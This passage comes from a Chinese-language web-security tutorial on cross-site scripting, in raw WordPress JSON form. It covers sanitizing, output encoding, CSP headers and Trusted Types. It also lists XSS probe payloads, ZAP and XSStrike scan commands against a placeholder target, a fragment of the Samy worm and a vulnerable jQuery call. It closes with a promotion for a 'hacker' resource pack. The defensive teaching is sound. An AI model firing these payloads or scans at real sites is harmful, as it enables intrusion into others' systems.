DOMPurify<span class=\"token punctuation\">.<\/span><span class=\"token function\">sanitize<\/span><span class=\"token punctuation\">(<\/span>str<span class=\"token punctuation\">,<\/span> <span class=\"token punctuation\">{<\/span><br \/>\n    <span class=\"token constant\">ALLOWED_TAGS<\/span><span class=\"token operator\">:<\/span> Object<span class=\"token punctuation\">.<\/span><span class=\"token function\">keys<\/span><span class=\"token punctuation\">(<\/span>allowedTags<span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">,<\/span><br \/>\n    <span class=\"token constant\">ALLOWED_ATTR<\/span><span class=\"token operator\">:<\/span> <span class=\"token punctuation\">[<\/span><span class=\"token punctuation\">]<\/span><br \/>\n  <span class=\"token punctuation\">}<\/span><span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">;<\/span><br \/>\n<span class=\"token punctuation\">}<\/span><\/p>\n<h4>7.2 \u8f93\u51fa\u7f16\u7801<\/h4>\n<table>\n<tr>\u4e0a\u4e0b\u6587\u7f16\u7801\u65b9\u5f0f\u793a\u4f8b<\/tr>\n<tbody>\n<tr>\n<td>HTML\u5185\u5bb9<\/td>\n<td>HTML\u5b9e\u4f53\u7f16\u7801<\/td>\n<td>&amp;lt;script&amp;gt;<\/td>\n<\/tr>\n<tr>\n<td>HTML\u5c5e\u6027<\/td>\n<td>HTML\u5c5e\u6027\u7f16\u7801<\/td>\n<td>&amp;quot;alert(1)&amp;quot;<\/td>\n<\/tr>\n<tr>\n<td>JavaScript<\/td>\n<td>JavaScript Unicode\u7f16\u7801<\/td>\n<td>\\\\u003Cscript\\\\u003E<\/td>\n<\/tr>\n<tr>\n<td>URL\u53c2\u6570<\/td>\n<td>URL\u7f16\u7801<\/td>\n<td>%3Cscript%3E<\/td>\n<\/tr>\n<tr>\n<td>CSS<\/td>\n<td>CSS\u7f16\u7801<\/td>\n<td>\\\\3Cscript\\\\3E<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h4>7.3 \u5185\u5bb9\u5b89\u5168\u7b56\u7565&#xff08;CSP&#xff09;<\/h4>\n<p># \u4e25\u683c\u7684CSP\u5934<br \/>\nContent-Security-Policy:<br \/>\n  default-src &#039;none&#039;;<br \/>\n  script-src &#039;self&#039; https:\/\/trusted-cdn.com;<br \/>\n  style-src &#039;self&#039; &#039;unsafe-inline&#039;;<br \/>\n  img-src &#039;self&#039; data:;<br \/>\n  connect-src &#039;self&#039;;<br \/>\n  font-src &#039;self&#039;;<br \/>\n  object-src &#039;none&#039;;<br \/>\n  frame-ancestors &#039;none&#039;;<br \/>\n  base-uri &#039;self&#039;;<br \/>\n  form-action &#039;self&#039;;<\/p>\n<h4>7.4 \u5176\u4ed6\u5b89\u5168\u63aa\u65bd<\/h4>\n<p><span class=\"token comment\">\/\/ 1. HttpOnly Cookie<\/span><br \/>\nSet<span class=\"token operator\">&#8211;<\/span>Cookie<span class=\"token operator\">:<\/span> sessionId<span class=\"token operator\">&#061;<\/span>abc123<span class=\"token punctuation\">;<\/span> HttpOnly<span class=\"token punctuation\">;<\/span> Secure<\/p>\n<p><span class=\"token comment\">\/\/ 2. \u8f93\u5165\u957f\u5ea6\u9650\u5236<\/span><br \/>\n<span class=\"token operator\">&lt;<\/span>input maxlength<span class=\"token operator\">&#061;<\/span><span class=\"token string\">&#034;100&#034;<\/span><span class=\"token operator\">&gt;<\/span><\/p>\n<p><span class=\"token comment\">\/\/ 3. \u6846\u67b6\u5b89\u5168\u8bbe\u7f6e<\/span><br \/>\n<span class=\"token comment\">\/\/ X-Frame-Options: DENY<\/span><br \/>\n<span class=\"token comment\">\/\/ X-Content-Type-Options: nosniff<\/span><\/p>\n<h3>8. \u68c0\u6d4b\u4e0e\u6d4b\u8bd5<\/h3>\n<h4>8.1 \u624b\u52a8\u6d4b\u8bd5\u5411\u91cf<\/h4>\n<p><span class=\"token comment\">\/\/ \u57fa\u7840\u6d4b\u8bd5payload<\/span><br \/>\n<span class=\"token operator\">&lt;<\/span>script<span class=\"token operator\">&gt;<\/span><span class=\"token function\">alert<\/span><span class=\"token punctuation\">(<\/span><span class=\"token number\">1<\/span><span class=\"token punctuation\">)<\/span><span class=\"token operator\">&lt;<\/span><span class=\"token operator\">\/<\/span>script<span class=\"token operator\">&gt;<\/span><br \/>\n<span class=\"token operator\">&lt;<\/span>img src<span class=\"token operator\">&#061;<\/span>x onerror<span class=\"token operator\">&#061;<\/span><span class=\"token function\">alert<\/span><span class=\"token punctuation\">(<\/span><span class=\"token number\">1<\/span><span class=\"token punctuation\">)<\/span><span class=\"token operator\">&gt;<\/span><br \/>\n&#034;<span class=\"token operator\">&gt;<\/span><span class=\"token operator\">&lt;<\/span>script<span class=\"token operator\">&gt;<\/span><span class=\"token function\">alert<\/span><span class=\"token punctuation\">(<\/span><span class=\"token number\">1<\/span><span class=\"token punctuation\">)<\/span><span class=\"token operator\">&lt;<\/span><span class=\"token operator\">\/<\/span>script<span class=\"token operator\">&gt;<\/span><br \/>\n<span class=\"token literal-property property\">javascript<\/span><span class=\"token operator\">:<\/span><span class=\"token function\">alert<\/span><span class=\"token punctuation\">(<\/span><span class=\"token number\">1<\/span><span class=\"token punctuation\">)<\/span><\/p>\n<p><span class=\"token comment\">\/\/ \u9ad8\u7ea7\u6d4b\u8bd5payload<\/span><br \/>\n<span class=\"token operator\">&lt;<\/span>svg onload<span class=\"token operator\">&#061;<\/span><span class=\"token function\">alert<\/span><span class=\"token punctuation\">(<\/span><span class=\"token number\">1<\/span><span class=\"token punctuation\">)<\/span><span class=\"token operator\">&gt;<\/span><br \/>\n<span class=\"token operator\">&lt;<\/span>iframe src<span class=\"token operator\">&#061;<\/span><span class=\"token string\">&#034;javascript:alert(1)&#034;<\/span><span class=\"token operator\">&gt;<\/span><\/p>\n<h4>8.2 \u81ea\u52a8\u5316\u626b\u63cf<\/h4>\n<p><span class=\"token comment\"># \u4f7f\u7528\u5de5\u5177<\/span><br \/>\n<span class=\"token comment\"># OWASP ZAP<\/span><br \/>\nzap-cli quick-scan &#8211;self-contained http:\/\/target.com<\/p>\n<p><span class=\"token comment\"># XSStrike<\/span><br \/>\npython xsstrike.py -u <span class=\"token string\">&#034;http:\/\/target.com\/search?q&#061;test&#034;<\/span><\/p>\n<p><span class=\"token comment\"># \u81ea\u5b9a\u4e49\u68c0\u6d4b\u811a\u672c<\/span><\/p>\n<h4>8.3 \u6d4f\u89c8\u5668\u5b89\u5168\u7279\u6027<\/h4>\n<p><span class=\"token comment\">\/\/ Trusted Types API<\/span><br \/>\n<span class=\"token keyword\">if<\/span> <span class=\"token punctuation\">(<\/span>window<span class=\"token punctuation\">.<\/span>trustedTypes <span class=\"token operator\">&amp;&amp;<\/span> window<span class=\"token punctuation\">.<\/span>trustedTypes<span class=\"token punctuation\">.<\/span>createPolicy<span class=\"token punctuation\">)<\/span> <span class=\"token punctuation\">{<\/span><br \/>\n  <span class=\"token keyword\">const<\/span> policy <span class=\"token operator\">&#061;<\/span> trustedTypes<span class=\"token punctuation\">.<\/span><span class=\"token function\">createPolicy<\/span><span class=\"token punctuation\">(<\/span><span class=\"token string\">&#039;default&#039;<\/span><span class=\"token punctuation\">,<\/span> <span class=\"token punctuation\">{<\/span><br \/>\n    <span class=\"token function-variable function\">createHTML<\/span><span class=\"token operator\">:<\/span> <span class=\"token punctuation\">(<\/span><span class=\"token parameter\">string<\/span><span class=\"token punctuation\">)<\/span> <span class=\"token operator\">&#061;&gt;<\/span> <span class=\"token punctuation\">{<\/span><br \/>\n      <span class=\"token comment\">\/\/ \u81ea\u5b9a\u4e49\u6e05\u7406\u903b\u8f91<\/span><br \/>\n      <span class=\"token keyword\">return<\/span> <span class=\"token function\">sanitizeHTML<\/span><span class=\"token punctuation\">(<\/span>string<span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">;<\/span><br \/>\n    <span class=\"token punctuation\">}<\/span><br \/>\n  <span class=\"token punctuation\">}<\/span><span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">;<\/span><br \/>\n<span class=\"token punctuation\">}<\/span><\/p>\n<h3>9. \u771f\u5b9e\u6848\u4f8b\u5206\u6790<\/h3>\n<h4>\u6848\u4f8b1&#xff1a;\u793e\u4ea4\u5a92\u4f53XSS\u8815\u866b<\/h4>\n<p><span class=\"token comment\">\/\/ \u8457\u540d\u7684Samy\u8815\u866b&#xff08;MySpace&#xff0c;2005&#xff09;<\/span><br \/>\n<span class=\"token comment\">\/\/ \u901a\u8fc7\u4e2a\u4eba\u8d44\u6599\u9875\u9762\u4f20\u64ad<\/span><br \/>\n<span class=\"token comment\">\/\/ \u611f\u67d3\u8d85\u8fc7100\u4e07\u7528\u6237<\/span><br \/>\n<span class=\"token comment\">\/\/ \u5173\u952e\u4ee3\u7801&#xff1a;<\/span><br \/>\n<span class=\"token operator\">&lt;<\/span>div id<span class=\"token operator\">&#061;<\/span>mycode style<span class=\"token operator\">&#061;<\/span>&#034;<span class=\"token constant\">BACKGROUND<\/span><span class=\"token operator\">:<\/span> <span class=\"token function\">url<\/span><span class=\"token punctuation\">(<\/span>&#039;java<br \/>\n<span class=\"token literal-property property\">script<\/span><span class=\"token operator\">:<\/span><span class=\"token function\">eval<\/span><span class=\"token punctuation\">(<\/span>document<span class=\"token punctuation\">.<\/span>all<span class=\"token punctuation\">.<\/span>mycode<span class=\"token punctuation\">.<\/span>expr<span class=\"token punctuation\">)<\/span><span class=\"token string\">&#039;)&#034; expr&#061;&#034;alert(&#039;<\/span><span class=\"token constant\">XSS<\/span>&#039;<span class=\"token punctuation\">)<\/span>&#034; <span class=\"token operator\">\/<\/span><span class=\"token operator\">&gt;<\/span><\/p>\n<h4>\u6848\u4f8b2&#xff1a;DOM XSS in jQuery<\/h4>\n<p><span class=\"token comment\">\/\/ CVE-2020-11022\/11023<\/span><br \/>\n<span class=\"token comment\">\/\/ \u6f0f\u6d1e\u4ee3\u7801&#xff1a;<\/span><br \/>\n<span class=\"token function\">$<\/span><span class=\"token punctuation\">(<\/span><span class=\"token string\">&#039;&lt;div&gt;&#039;<\/span><span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">.<\/span><span class=\"token function\">html<\/span><span class=\"token punctuation\">(<\/span>userInput<span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">;<\/span><\/p>\n<p><span class=\"token comment\">\/\/ \u4fee\u590d&#xff1a;<\/span><br \/>\n<span class=\"token function\">$<\/span><span class=\"token punctuation\">(<\/span><span class=\"token string\">&#039;&lt;div&gt;&#039;<\/span><span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">.<\/span><span class=\"token function\">text<\/span><span class=\"token punctuation\">(<\/span>userInput<span class=\"token punctuation\">)<\/span><span class=\"token punctuation\">;<\/span><\/p>\n<h3>10. \u53d1\u5c55\u8d8b\u52bf\u4e0e\u672a\u6765\u6311\u6218<\/h3>\n<h4>10.1 \u65b0\u5174\u5a01\u80c1<\/h4>\n<ul>\n<li>WebAssembly\u4e2d\u7684XSS&#xff1a;\u901a\u8fc7Wasm\u6a21\u5757\u7ed5\u8fc7\u4f20\u7edf\u68c0\u6d4b<\/li>\n<li>Shadow DOM XSS&#xff1a;Web\u7ec4\u4ef6\u4e2d\u7684\u9694\u79bb\u95ee\u9898<\/li>\n<li>\u673a\u5668\u5b66\u4e60\u6a21\u578b\u6295\u6bd2&#xff1a;\u95f4\u63a5\u5bfc\u81f4XSS\u6f0f\u6d1e<\/li>\n<\/ul>\n<h4>10.2 \u9632\u5fa1\u6f14\u8fdb<\/h4>\n<p><span class=\"token comment\">\/\/ \u73b0\u4ee3\u9632\u5fa1\u6280\u672f<\/span><br \/>\n<span class=\"token comment\">\/\/ 1. Subresource Integrity (SRI)<\/span><br \/>\n<span class=\"token operator\">&lt;<\/span>script src<span class=\"token operator\">&#061;<\/span><span class=\"token string\">&#034;https:\/\/cdn.example.com\/script.js&#034;<\/span><br \/>\n        integrity<span class=\"token operator\">&#061;<\/span><span class=\"token string\">&#034;sha384-oqVuAfXRKap7fdgcCY5uykM6&#043;R9GqQ8K\/uxy9rx7HNQlGYl1kPzQho1wx4JwY8wC&#034;<\/span><br \/>\n        crossorigin<span class=\"token operator\">&#061;<\/span><span class=\"token string\">&#034;anonymous&#034;<\/span><span class=\"token operator\">&gt;<\/span><span class=\"token operator\">&lt;<\/span><span class=\"token operator\">\/<\/span>script<span class=\"token operator\">&gt;<\/span><\/p>\n<p><span class=\"token comment\">\/\/ 2. Cross-Origin Resource Policy<\/span><br \/>\nCross<span class=\"token operator\">&#8211;<\/span>Origin<span class=\"token operator\">&#8211;<\/span>Resource<span class=\"token operator\">&#8211;<\/span>Policy<span class=\"token operator\">:<\/span> same<span class=\"token operator\">&#8211;<\/span>site<\/p>\n<p><span class=\"token comment\">\/\/ 3. Fetch Metadata<\/span><br \/>\nSec<span class=\"token operator\">&#8211;<\/span>Fetch<span class=\"token operator\">&#8211;<\/span>Site<span class=\"token operator\">:<\/span> cross<span class=\"token operator\">&#8211;<\/span>site<br \/>\nSec<span class=\"token operator\">&#8211;<\/span>Fetch<span class=\"token operator\">&#8211;<\/span>Mode<span class=\"token operator\">:<\/span> navigate<\/p>\n<h3>\u603b\u7ed3<\/h3>\n<p>XSS\u653b\u51fb\u4ecd\u7136\u662fWeb\u5b89\u5168\u4e2d\u6700\u666e\u904d\u4e14\u5371\u9669\u7684\u5a01\u80c1\u4e4b\u4e00\u3002\u968f\u7740Web\u6280\u672f\u7684\u53d1\u5c55&#xff0c;\u65b0\u7684\u653b\u51fb\u5411\u91cf\u4e0d\u65ad\u51fa\u73b0\u3002\u6709\u6548\u7684XSS\u9632\u5fa1\u9700\u8981&#xff1a;<\/p>\n<li>\u591a\u5c42\u9632\u5fa1\u7b56\u7565&#xff1a;\u8f93\u5165\u9a8c\u8bc1\u3001\u8f93\u51fa\u7f16\u7801\u3001CSP\u7b49\u591a\u91cd\u4fdd\u62a4<\/li>\n<li>\u5b89\u5168\u5f00\u53d1\u5b9e\u8df5&#xff1a;\u5728SDLC\u4e2d\u96c6\u6210\u5b89\u5168\u6d4b\u8bd5<\/li>\n<li>\u6301\u7eed\u76d1\u63a7&#xff1a;\u5b9e\u65f6\u68c0\u6d4b\u548c\u54cd\u5e94XSS\u653b\u51fb<\/li>\n<li>\u5b89\u5168\u610f\u8bc6&#xff1a;\u5bf9\u5f00\u53d1\u8005\u548c\u7528\u6237\u8fdb\u884c\u5b89\u5168\u6559\u80b2<\/li>\n<li>\u6df1\u5ea6\u9632\u5fa1&#xff1a;\u7ed3\u5408\u5176\u4ed6\u5b89\u5168\u63aa\u65bd&#xff08;WAF\u3001RASP\u7b49&#xff09;<\/li>\n<p>\u9632\u5fa1XSS\u4e0d\u4ec5\u662f\u6280\u672f\u6311\u6218&#xff0c;\u66f4\u662f\u6301\u7eed\u7684\u8fc7\u7a0b&#xff0c;\u9700\u8981\u5f00\u53d1\u56e2\u961f\u3001\u5b89\u5168\u56e2\u961f\u548c\u8fd0\u7ef4\u56e2\u961f\u7684\u5171\u540c\u534f\u4f5c\u3002\u968f\u7740Web\u6280\u672f\u7684\u6f14\u8fdb&#xff0c;XSS\u9632\u62a4\u4e5f\u9700\u8981\u4e0d\u65ad\u66f4\u65b0\u548c\u6539\u8fdb\u3002<\/p>\n<h4>\u7f51\u7edc\u5b89\u5168\u5b66\u4e60\u8d44\u6e90\u5206\u4eab:<\/h4>\n<p>\u7ed9\u5927\u5bb6\u5206\u4eab\u4e00\u4efd\u5168\u5957\u7684\u7f51\u7edc\u5b89\u5168\u5b66\u4e60\u8d44\u6599&#xff0c;\u7ed9\u90a3\u4e9b\u60f3\u5b66\u4e60 \u7f51\u7edc\u5b89\u5168\u7684\u5c0f\u4f19\u4f34\u4eec\u4e00\u70b9\u5e2e\u52a9&#xff01;<\/p>\n<p>\u5bf9\u4e8e\u4ece\u6765\u6ca1\u6709\u63a5\u89e6\u8fc7\u7f51\u7edc\u5b89\u5168\u7684\u540c\u5b66&#xff0c;\u6211\u4eec\u5e2e\u4f60\u51c6\u5907\u4e86\u8be6\u7ec6\u7684\u5b66\u4e60\u6210\u957f\u8def\u7ebf\u56fe\u3002\u53ef\u4ee5\u8bf4\u662f\u6700\u79d1\u5b66\u6700\u7cfb\u7edf\u7684\u5b66\u4e60\u8def\u7ebf&#xff0c;\u5927\u5bb6\u8ddf\u7740\u8fd9\u4e2a\u5927\u7684\u65b9\u5411\u5b66\u4e60\u51c6\u6ca1\u95ee\u9898\u3002<\/p>\n<h6>&#x1f449;1.\u6210\u957f\u8def\u7ebf\u56fe&amp;\u5b66\u4e60\u89c4\u5212&#x1f448;<\/h6>\n<p>\u8981\u5b66\u4e60\u4e00\u95e8\u65b0\u7684\u6280\u672f&#xff0c;\u4f5c\u4e3a\u65b0\u624b\u4e00\u5b9a\u8981\u5148\u5b66\u4e60\u6210\u957f\u8def\u7ebf\u56fe&#xff0c;\u65b9\u5411\u4e0d\u5bf9&#xff0c;\u52aa\u529b\u767d\u8d39\u3002<\/p>\n<p>\u5bf9\u4e8e\u4ece\u6765\u6ca1\u6709\u63a5\u89e6\u8fc7\u7f51\u7edc\u5b89\u5168\u7684\u540c\u5b66&#xff0c;\u6211\u4eec\u5e2e\u4f60\u51c6\u5907\u4e86\u8be6\u7ec6\u7684\u5b66\u4e60\u6210\u957f\u8def\u7ebf\u56fe&amp;\u5b66\u4e60\u89c4\u5212\u3002\u53ef\u4ee5\u8bf4\u662f\u6700\u79d1\u5b66\u6700\u7cfb\u7edf\u7684\u5b66\u4e60\u8def\u7ebf&#xff0c;\u5927\u5bb6\u8ddf\u7740\u8fd9\u4e2a\u5927\u7684\u65b9\u5411\u5b66\u4e60\u51c6\u6ca1\u95ee\u9898\u3002<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/01\/20260126061729-697706f9e43b5.webp\" alt=\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\" \/> <img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/01\/20260126061729-697706f9ee5ca.webp\" alt=\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\" \/><\/p>\n<h6>&#x1f449;2.\u7f51\u5b89\u5165\u95e8\u5230\u8fdb\u9636\u89c6\u9891\u6559\u7a0b&#x1f448;<\/h6>\n<p>\u5f88\u591a\u670b\u53cb\u90fd\u4e0d\u559c\u6b22\u6666\u6da9\u7684\u6587\u5b57&#xff0c;\u6211\u4e5f\u4e3a\u5927\u5bb6\u51c6\u5907\u4e86\u89c6\u9891\u6559\u7a0b&#xff0c;\u5176\u4e2d\u4e00\u5171\u670921\u4e2a\u7ae0\u8282&#xff0c;\u6bcf\u4e2a\u7ae0\u8282\u90fd\u662f\u5f53\u524d\u677f\u5757\u7684\u7cbe\u534e\u6d53\u7f29\u3002****&#xff08;\u5168\u5957\u6559\u7a0b\u6587\u672b\u9886\u53d6\u54c8&#xff09; <img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/01\/20260126061730-697706fa04362.webp\" alt=\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\" \/><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/01\/20260126061730-697706fa0de6a.webp\" alt=\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\" \/><\/p>\n<h6>&#x1f449;3.SRC&amp;\u9ed1\u5ba2\u6587\u6863&#x1f448;<\/h6>\n<p>\u5927\u5bb6\u6700\u559c\u6b22\u4e5f\u662f\u6700\u5173\u5fc3\u7684SRC\u6280\u672f\u6587\u7c4d&amp;\u9ed1\u5ba2\u6280\u672f\u4e5f\u6709\u6536\u5f55<\/p>\n<p>SRC\u6280\u672f\u6587\u7c4d&#xff1a;<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/01\/20260126061730-697706fa174da.webp\" alt=\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\" \/><\/p>\n<p>\u9ed1\u5ba2\u8d44\u6599\u7531\u4e8e\u662f\u654f\u611f\u8d44\u6e90&#xff0c;\u8fd9\u91cc\u4e0d\u80fd\u76f4\u63a5\u5c55\u793a\u54e6&#xff01;****&#xff08;\u5168\u5957\u6559\u7a0b\u6587\u672b\u9886\u53d6\u54c8&#xff09;<\/p>\n<h6>&#x1f449;4.\u62a4\u7f51\u884c\u52a8\u8d44\u6599&#x1f448;<\/h6>\n<p>\u5176\u4e2d\u5173\u4e8eHW\u62a4\u7f51\u884c\u52a8&#xff0c;\u4e5f\u51c6\u5907\u4e86\u5bf9\u5e94\u7684\u8d44\u6599&#xff0c;\u8fd9\u4e9b\u5185\u5bb9\u53ef\u76f8\u5f53\u4e8e\u6bd4\u8d5b\u7684\u91d1\u624b\u6307&#xff01;<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/01\/20260126061730-697706fa209ff.webp\" alt=\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\" \/><\/p>\n<h6>&#x1f449;5.\u9ed1\u5ba2\u5fc5\u8bfb\u4e66\u5355&#x1f448;<\/h6>\n<p><img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/01\/20260126061730-697706fa29d13.webp\" alt=\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\" \/><\/p>\n<h6>&#x1f449;6.\u7f51\u7edc\u5b89\u5168\u5c97\u9762\u8bd5\u9898\u5408\u96c6&#x1f448;<\/h6>\n<p>\u5f53\u4f60\u81ea\u5b66\u5230\u8fd9\u91cc&#xff0c;\u4f60\u5c31\u8981\u5f00\u59cb\u601d\u8003\u627e\u5de5\u4f5c\u7684\u4e8b\u60c5\u4e86&#xff0c;\u800c\u5de5\u4f5c\u7ed5\u4e0d\u5f00\u7684\u5c31\u662f\u771f\u9898\u548c\u9762\u8bd5\u9898\u3002 <img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/01\/20260126061730-697706fa33042.webp\" alt=\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\" \/> \u6240\u6709\u8d44\u6599\u5171282G&#xff0c;\u670b\u53cb\u4eec\u5982\u679c\u6709\u9700\u8981\u5168\u5957\u300a\u7f51\u7edc\u5b89\u5168\u5165\u95e8&#043;\u8fdb\u9636\u5b66\u4e60\u8d44\u6e90\u5305\u300b&#xff0c;\u53ef\u4ee5\u626b\u63cf\u4e0b\u65b9\u4e8c\u7ef4\u7801\u6216\u94fe\u63a5\u514d\u8d39\u9886\u53d6~<\/p>\n<p>**\u8bfb\u8005\u798f\u5229 |** CSDN\u5927\u793c\u5305&#xff1a;\u300a\u7f51\u7edc\u5b89\u5168\u5165\u95e8&amp;\u8fdb\u9636\u5b66\u4e60\u8d44\u6e90\u5305\u300b\u514d\u8d39\u5206\u4eab **&#xff08;\u5b89\u5168\u94fe\u63a5&#xff0c;\u653e\u5fc3\u70b9\u51fb&#xff09;**<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/01\/20260126061730-697706fa3c4e8.jpg\" alt=\"\u5728\u8fd9\u91cc\u63d2\u5165\u56fe\u7247\u63cf\u8ff0\" \/><\/p>\n","protected":false},"excerpt":{"rendered":"<p>XSS\u653b\u51fb\u8be6\u89e3<br \/>\n1. XSS\u653b\u51fb\u6982\u8ff0<br \/>\nXSS&#xff08;Cross-Site Scripting&#xff0c;\u8de8\u7ad9\u811a\u672c\u653b\u51fb&#xff09; \u662f\u4e00\u79cd\u5c06\u6076\u610f\u811a\u672c\u6ce8\u5165\u5230\u53ef\u4fe1\u7f51\u7ad9\u4e2d\u7684\u5b89\u5168\u6f0f\u6d1e\u3002\u653b\u51fb\u8005\u901a\u8fc7\u5728Web\u9875\u9762\u4e2d\u63d2\u5165\u6076\u610f\u811a\u672c&#xff0c;\u5f53\u5176\u4ed6\u7528\u6237\u6d4f\u89c8\u8be5\u9875\u9762\u65f6&#xff0c;\u811a\u672c\u4f1a\u5728\u7528\u6237\u6d4f\u89c8\u5668\u4e2d\u6267\u884c\u3002<br \/>\n\u5173\u952e\u7279\u5f81&#xff1a;<br \/>\n\u653b\u51fb\u53d1\u751f\u5728\u7528\u6237\u6d4f\u89c8\u5668\u4e2d\u5229\u7528\u7f51\u7ad9\u5bf9\u7528\u6237\u8f93\u5165\u7684\u4fe1\u4efb\u7ed5\u8fc7\u540c\u6e90\u7b56\u7565&#xff08;SOP&#xff09;\u7684\u9650\u5236\u5f71\u54cd\u8303\u56f4\u5e7f\u6cdb&#xff1a;\u7a83\u53d6Co<\/p>\n","protected":false},"author":2,"featured_media":66257,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[7003,275,1042,122],"topic":[],"class_list":{"0":"post-66258","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","6":"hentry","7":"category-server","8":"tag-xss","9":"tag-web","11":"tag-122"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v20.3 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Web\u5b89\u5168\u5fc5\u77e5\uff5cXSS\u653b\u51fb\u8be6\u89e3\uff1a\u4ece\u6f0f\u6d1e\u6316\u6398\u5230\u9632\u62a4\u5b9e\u6218\uff0c\u770b\u8fd9\u7bc7\u5c31\u591f\u4e86 - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.wsisp.com\/helps\/66258.html\" \/>\n<meta property=\"og:locale\" content=\"zh_CN\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Web\u5b89\u5168\u5fc5\u77e5\uff5cXSS\u653b\u51fb\u8be6\u89e3\uff1a\u4ece\u6f0f\u6d1e\u6316\u6398\u5230\u9632\u62a4\u5b9e\u6218\uff0c\u770b\u8fd9\u7bc7\u5c31\u591f\u4e86 - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3\" \/>\n<meta property=\"og:description\" content=\"XSS\u653b\u51fb\u8be6\u89e3 1. XSS\u653b\u51fb\u6982\u8ff0 XSS&#xff08;Cross-Site Scripting&#xff0c;\u8de8\u7ad9\u811a\u672c\u653b\u51fb&#xff09; \u662f\u4e00\u79cd\u5c06\u6076\u610f\u811a\u672c\u6ce8\u5165\u5230\u53ef\u4fe1\u7f51\u7ad9\u4e2d\u7684\u5b89\u5168\u6f0f\u6d1e\u3002\u653b\u51fb\u8005\u901a\u8fc7\u5728Web\u9875\u9762\u4e2d\u63d2\u5165\u6076\u610f\u811a\u672c&#xff0c;\u5f53\u5176\u4ed6\u7528\u6237\u6d4f\u89c8\u8be5\u9875\u9762\u65f6&#xff0c;\u811a\u672c\u4f1a\u5728\u7528\u6237\u6d4f\u89c8\u5668\u4e2d\u6267\u884c\u3002 \u5173\u952e\u7279\u5f81&#xff1a; \u653b\u51fb\u53d1\u751f\u5728\u7528\u6237\u6d4f\u89c8\u5668\u4e2d\u5229\u7528\u7f51\u7ad9\u5bf9\u7528\u6237\u8f93\u5165\u7684\u4fe1\u4efb\u7ed5\u8fc7\u540c\u6e90\u7b56\u7565&#xff08;SOP&#xff09;\u7684\u9650\u5236\u5f71\u54cd\u8303\u56f4\u5e7f\u6cdb&#xff1a;\u7a83\u53d6Co\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.wsisp.com\/helps\/66258.html\" \/>\n<meta property=\"og:site_name\" content=\"\u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3\" \/>\n<meta property=\"article:published_time\" content=\"2026-01-26T06:17:31+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/01\/20260126061729-697706f9e43b5.webp\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u4f5c\u8005\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 \u5206\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.wsisp.com\/helps\/66258.html\",\"url\":\"https:\/\/www.wsisp.com\/helps\/66258.html\",\"name\":\"Web\u5b89\u5168\u5fc5\u77e5\uff5cXSS\u653b\u51fb\u8be6\u89e3\uff1a\u4ece\u6f0f\u6d1e\u6316\u6398\u5230\u9632\u62a4\u5b9e\u6218\uff0c\u770b\u8fd9\u7bc7\u5c31\u591f\u4e86 - 